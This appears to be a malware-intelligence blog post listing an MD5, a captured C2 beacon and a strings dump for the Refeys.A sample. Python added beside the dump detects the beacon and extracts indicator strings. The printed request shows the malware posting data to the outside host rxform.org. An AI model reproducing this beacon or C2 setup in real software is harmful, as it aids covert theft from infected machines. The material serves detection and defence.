About contagio exchange

Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy, and Mila too, so this was not a very active site (my fault, probably), so I will just be dumping malware strings here; it often helps in malware identification, and googling is the best way.
With just strings, it is not exactly a fun blog to read, but it might become a useful resource over time.
I will not be posting samples here, just MD5s. You can find the corresponding samples on contagio, or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Wednesday, August 21, 2013

Refeys.A strings - CRIME

Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112
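The request above is what makes this sample easy to spot on the wire: an HTTP/1.0 form POST to /sys.php, a 2002-era Chimera/Gecko User-Agent claiming PPC Mac OS X (sent by what the strings below show to be a Win32 PE), and a gmail.com Referer on a request that is not going to Google. The matcher below is an added example, not code from Contagio or from the sample; SAMPLE_REQUEST is a constructed copy of the request shown here (the 112-byte body is not on the page, so it is left empty), and the trait names and GOOGLE_SUFFIXES list are assumptions for the example.

```python
"""Match the Refeys.A beacon shown above against a raw HTTP request.

Added example, not code from Contagio or from the sample. The indicator
values come from the request on this page; SAMPLE_REQUEST is a constructed
copy of that request with the (unshown) body left empty.
"""
from __future__ import annotations

SAMPLE_REQUEST = (
    "POST /sys.php HTTP/1.0\r\n"
    "Host: rxform.org\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; "
    "rv:1.0.1) Gecko/20021216 Chimera/0.6\r\n"
    "Referer: http://www.gmail.com\r\n"
    "Content-length: 112\r\n"
    "\r\n"
)

# Assumed: hostnames that could legitimately carry a gmail.com Referer.
GOOGLE_SUFFIXES = ("gmail.com", "google.com")


def parse_request(raw: str) -> tuple[str, str, str, dict[str, str]]:
    """Return (method, path, version, headers); header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def refeys_indicators(raw: str) -> list[str]:
    """Return the names of the beacon traits present in the request.

    Each trait alone is weak; the combination is what identifies the beacon.
    """
    method, path, version, h = parse_request(raw)
    hits: list[str] = []
    ua = h.get("user-agent", "")
    # 2002-era Chimera/Gecko UA claiming PPC Mac OS X, sent by a Win32 PE.
    if "Gecko/20021216" in ua and "Chimera/0.6" in ua:
        hits.append("stale-mac-ua")
    # HTTP/1.0 form POST to /sys.php, as in the captured request.
    if (method == "POST" and version == "HTTP/1.0" and path == "/sys.php"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        hits.append("sys.php-form-post")
    # Referer says gmail.com but the request is going somewhere else.
    host = h.get("host", "").lower()
    if "gmail.com" in h.get("referer", "") and not host.endswith(GOOGLE_SUFFIXES):
        hits.append("gmail-referer-mismatch")
    # Exact C2 host from the capture; domains rotate, so this is the weakest trait.
    if host == "rxform.org":
        hits.append("known-c2-host")
    return hits


if __name__ == "__main__":
    print(refeys_indicators(SAMPLE_REQUEST))
```

Run it over proxy logs or a pcap's reassembled requests and alert on two or more traits together rather than on any single one: the stale User-Agent and the Referer mismatch survive a change of C2 domain, while the hostname check does not.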



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880


Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.sxdata
.rsrc
@.reloc
15:~@
5]}@
-------------------snip
@_^[]
CRYPT32.dll
CertAddCRLContextToStore
CertAddCRLLinkToStore
CertAddCTLContextToStore
CertAddCTLLinkToStore
CertAddCertificateContextToStore
CertAddCertificateLinkToStore
CertAddEncodedCRLToStore
CertAddEncodedCTLToStore
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToSystemStoreA
CertAddEncodedCertificateToSystemStoreW
CertAddEnhancedKeyUsageIdentifier
CertAddSerializedElementToStore
CertAddStoreToCollection
CertAlgIdToOID
CertCloseStore
CertCompareCertificate
CertCompareCertificateName
CertCompareIntegerBlob
CertComparePublicKeyInfo
CertControlStore
CertCreateCRLContext
CertCreateCTLContext
CertCreateCTLEntryFromCertificateContextProperties
CertCreateCertificateChainEngine
CertCreateCertificateContext
CertCreateContext
CertCreateSelfSignCertificate
CertDeleteCRLFromStore
CertDeleteCTLFromStore
CertDeleteCertificateFromStore
CertDuplicateCRLContext
CertDuplicateCTLContext
CertDuplicateCertificateChain
CertDuplicateCertificateContext
CertDuplicateStore
CertEnumCRLContextProperties
CertEnumCRLsInStore
CertEnumCTLContextProperties
CertEnumCTLsInStore
CertEnumCertificateContextProperties
CertEnumCertificatesInStore
CertEnumPhysicalStore
CertEnumSubjectInSortedCTL
CertEnumSystemStore
CertEnumSystemStoreLocation
CertFindAttribute
CertFindCRLInStore
CertFindCTLInStore
CertFindCertificateInCRL
CertFindCertificateInStore
CertFindChainInStore
CertFindExtension
CertFindRDNAttr
CertFindSubjectInCTL
CertFindSubjectInSortedCTL
CertFreeCRLContext
CertFreeCTLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCRLFromStore
CertGetCTLContextProperty
CertGetCertificateChain
CertGetCertificateContextProperty
CertGetEnhancedKeyUsage
CertGetIntendedKeyUsage
CertGetIssuerCertificateFromStore
CertGetNameStringA
CertGetNameStringW
CertGetPublicKeyLength
CertGetStoreProperty
CertGetSubjectCertificateFromStore
CertGetValidUsages
CertIsRDNAttrsInCertificateName
CertIsValidCRLForCertificate
CertNameToStrA
CertNameToStrW
CertOIDToAlgId
CertOpenStore
CertOpenSystemStoreA
CertOpenSystemStoreW
CertRDNValueToStrA
CertRDNValueToStrW
CertRegisterPhysicalStore
CertRegisterSystemStore
CertRemoveEnhancedKeyUsageIdentifier
CertRemoveStoreFromCollection
CertResyncCertificateChainEngine
CertSaveStore
CertSerializeCRLStoreElement
CertSerializeCTLStoreElement
CertSerializeCertificateStoreElement
CertSetCRLContextProperty
CertSetCTLContextProperty
CertSetCertificateContextPropertiesFromCTLEntry
CertSetCertificateContextProperty
CertSetEnhancedKeyUsage
CertSetStoreProperty
CertStrToNameA
CertStrToNameW
CertUnregisterPhysicalStore
CertUnregisterSystemStore
CertVerifyCRLRevocation
CertVerifyCRLTimeValidity
CertVerifyCTLUsage
CertVerifyCertificateChainPolicy
CertVerifyRevocation
CertVerifySubjectCertificateContext
CertVerifyTimeValidity
CertVerifyValidityNesting
ChainWlxLogoffEvent
CloseCertPerformanceData
CollectCertPerformanceData
CreateFileU
CryptAcquireCertificatePrivateKey
CryptAcquireContextU
CryptBinaryToStringA
CryptBinaryToStringW
CryptCloseAsyncHandle
CryptCreateAsyncHandle
CryptCreateKeyIdentifierFromCSP
CryptDecodeMessage
CryptDecodeObject
CryptDecodeObjectEx
CryptDecryptAndVerifyMessageSignature
CryptDecryptMessage
CryptEncodeObject
CryptEncodeObjectEx
CryptEncryptMessage
CryptEnumKeyIdentifierProperties
CryptEnumOIDFunction
CryptEnumOIDInfo
CryptEnumProviders
GetVersion
VirtualAlloc
GetCurrentProcessId
IsBadCodePtr
GetDiskFreeSpaceW
GetSystemTimeAsFileTime
GetSystemDirectoryA
lstrcmpi
FileTimeToSystemTime
lstrcpy
GetModuleHandleA
SleepEx
SetCurrentDirectoryW
CreateThread
CreateDirectoryA
GetExpandedNameA
GetThreadPriority
WinExec
KERNEL32.DLL
CreateWindowExW
SetWindowLongA
GetFocus
IsDlgButtonChecked
GetMenuStringW
CreateDialogParamA
GetForegroundWindow
CreateMenu
CreateDialogIndirectParamW
SetActiveWindow
wvsprintfW
DialogBoxIndirectParamW
GetClassInfoExW
GetTopWindow
SetWindowLongW
USER32.DLL
VarDecFromI1
VarUI8FromUI2
VarDecSub
VarCyFromR4
VarR8FromDate
OleLoadPictureEx
VarDateFromI8
VarDecFromCy
VarDateFromUI4
VarDateFromI1
VarDecCmp
VarR8FromDec
VarI2FromUI8
VarRound
RegisterTypeLib
VarDecFromUI8
VarUI8FromDate
VarDateFromStr
VarR8Pow
VarUI1FromBool
VarI4FromR4
VarDateFromUdate
VarBstrFromUI2
VarImp
DispGetIDsOfNames
VarCySub
GetVarConversionLocaleSetting
oleaut32.dll
CreateEllipticRgn
TranslateCharsetInfo
CreateFontW
CreateICW
gdi32.dll
m6<g
&3m&m&
IXPh
m&m&
h<-6<5
m&m&m&
 V t 
h<Skk
(yy_FF/
sSc$
m&m&V
GFZO
K.c$
sS0s
sSSG
6psS
qH'z
WqHsz
xESSSH
h<Sm&m&m&
h<m&
Vm&o
oSSS
op2SS
DSSSHw
2SSH
sSc$
RGec$
H'zF
m&m&m&
bYSSS
__Gu
szc$
%HSSS.
gsSSSW
q*tN^
26vR
t6vR
SSS|a
SSS|
SSS|j^t
g>SSS
g8SSSW
gNSSS
?RRt6
mz<<kkk
&m5<
m&m&
m&m&
&m&m&m&Nih
kpCVBnunGZBMPGgvkEyVipix
.8#&,&->@-)+;=5+3*:!5Xepewehypus
ANDUWfypr
?'47+3=8/<13%+6'60%)
tdDDTWrZnHdYSypnZgYEGg
gJhfNYlTlPxCC,:6&2">.!/*>,.
?1(&+*36=D
!-#;!/;('
mUfGKUjIaEFCGZVKC
Domec
/$%?OsLJyG0:()/)@6#.@9=:
=;:'&:
$!#&@6.>
Pff0}
2&<9&&9)3?+>
$911:4:>(1)5'4'BZa
"?;?
,1!
---------------------snip
RJk&ZJk<ORk
Y<33<Y
########
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
@jjjj
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Bitet
Jebo
Coposa
VS_VERSION_INFO
StringFileInfo
04090000
LegalCopyright
fLiqjPPlr
CompanyName
Yaldex Software
FileVersion
0.9.7.7
VarFileInfo
Translation
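The two sections above are a strings dump in its usual form: runs of printable 7-bit bytes ("Ascii Strings") and runs of UTF-16LE characters ("Unicode Strings"), which is how the version-info values (Yaldex Software, 0.9.7.7) surface separately from the import names. The extractor below reproduces that split and checks the result against a small indicator list. It is an added example, not Contagio's tooling; SAMPLE_BLOB is a constructed stand-in for a PE file seeded with a few strings copied from this dump, and REFEYS_INDICATORS is an assumed list built from the dump and the Traffic section.

```python
"""Produce the kind of ASCII / Unicode string dump shown above and check it
for indicators.

Added example, not Contagio's tooling. SAMPLE_BLOB is a constructed
stand-in for a PE file, seeded with strings taken from the dump on this
page; REFEYS_INDICATORS is assumed for illustration.
"""
import re


def ascii_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable 7-bit characters, like the "Ascii Strings" section."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def unicode_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of UTF-16LE printable characters (each byte followed by 0x00),
    like the "Unicode Strings" section."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def indicator_hits(data: bytes, indicators: set[str]) -> list[str]:
    """Which of the given indicator strings appear in either string set."""
    found = set(ascii_strings(data)) | set(unicode_strings(data))
    return sorted(indicators & found)


# Constructed stand-in for a PE image: DOS stub text, an import name,
# some junk bytes, and two UTF-16LE version-info strings from the dump.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"!This program cannot be run in DOS mode.\r\n"
    b"\x01\x02\x03"
    b"CRYPT32.dll\x00CertOpenSystemStoreA\x00\x8f\x00\x17"
    + "Yaldex Software".encode("utf-16-le") + b"\x00\x00"
    + "0.9.7.7".encode("utf-16-le") + b"\x00\x00"
    + b"\xde\xad\x42\x00"
)

# Assumed indicator set: version-info strings from the dump plus the
# User-Agent fragment from the Traffic section.
REFEYS_INDICATORS = {"Yaldex Software", "0.9.7.7", "Chimera/0.6", "CRYPT32.dll"}


if __name__ == "__main__":
    for s in ascii_strings(SAMPLE_BLOB):
        print("A", s)
    for s in unicode_strings(SAMPLE_BLOB):
        print("U", s)
    print(indicator_hits(SAMPLE_BLOB, REFEYS_INDICATORS))
```

When reading a dump like this one, weigh the strings by how hard they are to fake. The CRYPT32 block above is a long alphabetical run of that DLL's export names (CertAdd... through CryptEnumProviders, including ChainWlxLogoffEvent and CollectCertPerformanceData), far more than a small program would call, and the oleaut32 Var* names look just as arbitrary; with the short junk strings between them, that reads like a packer-padded import table, so the import names are weak search terms. The version-info strings, the manifest, and the request traits from the Traffic section are the ones worth googling and pivoting on.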